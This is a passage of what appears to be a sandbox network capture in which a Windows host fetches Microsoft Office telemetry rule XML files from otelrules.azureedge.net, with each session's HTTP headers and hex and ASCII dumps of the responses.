2024-12-07 09:52:00 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:00 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 44286e75-701e-0032-5705-48a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095200Z-r1cf579d778kr8xrhC1EWRfkun00000002c0000000003spg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:00 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:00 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 32ce5259-b01e-003e-4804-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095200Z-r1cf579d778lntp7hC1EWR9gg400000001cg0000000037yz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:00 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:02 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:02 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 1ccbfaf0-201e-0003-3306-48f85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095202Z-r1cf579d778dndrdhC1EWR4b2400000001kg000000003are x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:02 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:02 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:02 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 8eb9891a-501e-005b-7103-48d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095202Z-r1cf579d7782ctslhC1EWRfbrw00000002f0000000002660 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:02 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	49855	13.107.246.63	443	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:02 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:02 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 83446ce3-101e-0046-0a10-4891b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095202Z-r1cf579d778qlpkrhC1EWRpfc800000002qg000000001xnn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:02 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:02 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:02 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fc2f82a1-a01e-006f-4f06-4813cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095202Z-r1cf579d778kr8xrhC1EWRfkun00000002c0000000003sru x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:02 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.6	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:02 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:02 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 1ec3a3fb-701e-0001-7303-48b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095202Z-r1cf579d778d5zkmhC1EWRk6h800000002d0000000003ncy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:02 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:04 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:04 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: e2bfbc9d-f01e-0085-0f03-4888ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095204Z-r1cf579d7782ctslhC1EWRfbrw00000002gg000000001gwx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:04 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:04 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:04 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 22946db9-b01e-0021-4e03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095204Z-r1cf579d778dfdgnhC1EWRd3w000000001xg000000000dtc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:04 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:04 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:04 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 42c4dea6-f01e-0099-6c03-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095204Z-r1cf579d778lntp7hC1EWR9gg400000001bg0000000044qe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:04 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	49862	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:04 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:04 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 1dad0878-201e-0071-1606-48ff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095204Z-r1cf579d778t6txphC1EWRsd4400000002mg0000000004fa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:05 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
